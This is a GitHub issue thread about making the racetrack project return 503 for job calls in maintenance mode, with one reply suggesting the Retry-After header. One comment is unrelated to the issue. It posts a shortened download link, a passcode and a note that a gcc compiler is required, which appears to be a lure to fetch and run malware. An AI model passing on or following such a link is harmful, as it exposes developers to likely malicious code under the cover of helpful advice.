### ISSUE TITLE
Prohibit calling jobs in maintenance mode

### ISSUE THREAD

**Issue by iszulcdeepsense** [TheRacetrack/racetrack#517]
Maintenance mode doesn't prohibit calling the jobs.
Maintenance mode should prevent DB writes, it was true when it first appeared. Back then, Job calls were allowed as they were read-only. But later on, async job calls have been introduced and we started keeping them in database, making maintenance mode a bit inconsistent. That's what makes confusion right now.

If maintenance mode is enabled, it should return `503 Service Unavailable` status whenever a job is being called.

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by JosefAssadERST** [comment]
Yeah 503 seems right. If we want to be really good boys and girls, [there's a HTTP header helping the client work out when to retry](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/503), so our ESCs could actually just have their retries respect that and they wouldn't even need to sit and manhandle their integrations.
